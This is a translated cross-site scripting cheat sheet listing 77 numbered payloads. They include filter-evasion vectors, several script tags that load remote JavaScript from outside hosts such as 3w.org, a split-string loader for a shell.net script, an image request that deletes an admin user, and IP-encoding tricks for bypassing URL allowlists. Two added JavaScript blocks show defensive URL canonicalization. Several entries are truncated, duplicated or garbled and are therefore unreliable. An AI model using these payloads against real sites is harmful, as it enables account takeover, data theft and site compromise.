Cross-site image shell
XSS cross-site code: <script>alert("")</script>

Put the code on the first line of the trojan and change the trojan into JPG image format; when the image-format trojan is accessed, our trojan is executed as well.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Fixing a defective IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, no semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also no semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null characters
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null characters 2; null characters are basically ineffective domestically, because there is nowhere to use them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in the IMG tag
<IMG SRC=" javascript:alert('XSS');">
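Defender's side of entries 3 to 19, as an added example in JavaScript that is not part of the original post: a URL-valued attribute (SRC, HREF, BACKGROUND and the like) must be canonicalized before its scheme is allow-listed, otherwise case changes, HTML numeric entities with or without semicolons, and embedded NUL/tab/newline characters carry a javascript: URL past the check. The set of allowed schemes is an assumption.

```javascript
// Added example (not from the original post): undo the obfuscations in entries 3-19
// before deciding whether a URL-valued attribute is safe to emit.

// Decode HTML numeric character references, including the semicolon-less decimal and
// hex forms that lenient parsers accept (entries 5, 8-10).
function decodeNumericEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (m, code) => {
    const cp = /^x/i.test(code) ? parseInt(code.slice(1), 16) : parseInt(code, 10);
    return cp > 0x10ffff ? m : String.fromCodePoint(cp);
  });
}

// Remove the characters legacy browsers skipped inside "jav\tascript:" and before the
// scheme: NUL, tab, CR, LF, other C0 controls, space, DEL, NBSP, the U+2000 block spaces,
// ideographic space and BOM (entries 11-19 and 47). Used only for the decision, never to
// "clean" a value for output.
function stripSeparators(s) {
  return s.replace(/[\u0000-\u0020\u007f\u00a0\u2000-\u200f\u3000\ufeff]/g, '');
}

// The scheme is the run of [a-z0-9+.-] before the first ':' and must start with a letter;
// '' means a relative or protocol-relative URL. Case is folded (entry 4).
function schemeOf(raw) {
  const s = stripSeparators(decodeNumericEntities(String(raw)));
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(s);
  return m ? m[1].toLowerCase() : '';
}

// Allow-list, do not deny-list: javascript:, vbscript:, data: and anything unknown fail.
// The allowed set is an assumption for this example.
const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);
function isSafeUrl(raw) {
  const scheme = schemeOf(raw);
  return scheme === '' || ALLOWED_SCHEMES.has(scheme);
}
```

Note that a passing scheme says nothing about the host; a protocol-relative `//3w.org/...` still passes here and needs a separate host check.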

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping filtered JavaScript
\";alert('XSS');//

(30) Closing the Title tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters added (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (made of an opening angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed Flash that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash, you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP as decimal
<A HREF="http://3232235521">XSS</A>

(71) IP as hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP as octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS with trailing dot
<A HREF="http://www.google.com./">XSS</A>
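For entries 70 to 76, an added example in JavaScript that is not from the original post: a link allowlist has to compare canonical hosts, because browsers accept the decimal, hexadecimal, octal and mixed IPv4 spellings above, ignore tabs and newlines inside the URL, fold case, and treat a trailing dot as the same name. The helper names and the allowlist contents are assumptions.

```javascript
// Added example (not from the original post): canonicalize the host of a URL so an
// allowlist check is not bypassed by the numeric-IP, trailing-dot, case and embedded
// whitespace tricks in entries 70-76.

// Parse one dotted component the way browsers do: 0x.. is hex, a leading 0 is octal,
// anything else is decimal. Returns null for a component that is not a number.
function parseIPv4Part(part) {
  let radix = 10, digits = part;
  if (/^0x/i.test(part)) { radix = 16; digits = part.slice(2); }
  else if (part.length > 1 && part[0] === '0') { radix = 8; digits = part.slice(1); }
  if (digits === '') return radix === 16 ? 0 : null;   // a bare "0x" means 0
  const valid = { 16: /^[0-9a-f]+$/i, 8: /^[0-7]+$/, 10: /^[0-9]+$/ }[radix];
  return valid.test(digits) ? parseInt(digits, radix) : null;
}

// Dotted-quad form of a numeric IPv4 host (1 to 4 components, the last one filling
// the remaining bytes, so "3232235521" is one component), or null for a DNS name.
function ipv4FromHost(host) {
  const parts = host.split('.');
  if (parts.length > 1 && parts[parts.length - 1] === '') parts.pop();  // trailing dot
  if (parts.length > 4) return null;
  const nums = parts.map(parseIPv4Part);
  if (nums.some(n => n === null)) return null;
  const head = nums.slice(0, -1), last = nums[nums.length - 1];
  if (head.some(n => n > 255) || last >= 256 ** (5 - nums.length)) return null;
  const value = head.reduce((acc, n, i) => acc + n * 256 ** (3 - i), last);
  return [24, 16, 8, 0].map(s => (value >>> s) & 255).join('.');
}

// Strip the control characters lenient parsers ignore ("6<TAB>6" in entry 73), fold
// case, expand numeric forms and drop the absolute-DNS trailing dot (entry 76).
function canonicalHost(host) {
  const h = String(host).replace(/[\u0000-\u0020\u007f]/g, '').toLowerCase();
  return ipv4FromHost(h) ?? h.replace(/\.$/, '');
}

// Host of the URL's authority; null when there is no "//" authority at all
// (relative paths and javascript: links, entry 77, have none).
function hostOfUrl(url) {
  const s = String(url).replace(/[\u0000-\u0020\u007f]/g, '');
  const m = /^(?:[a-z][a-z0-9+.-]*:)?\/\/(?:[^@\/?#]*@)?([^:\/?#]*)/i.exec(s);
  return m ? m[1] : null;
}

// Allowlist check on the canonical host; `allowlist` is a Set of canonical host strings.
function isAllowedHost(url, allowlist) {
  const host = hostOfUrl(url);
  return host !== null && allowlist.has(canonicalHost(host));
}
```

Entry 75 is the reminder that "google.com" and "www.google.com" are different hosts: an allowlist must list every name it intends to accept rather than relying on a prefix match.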

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>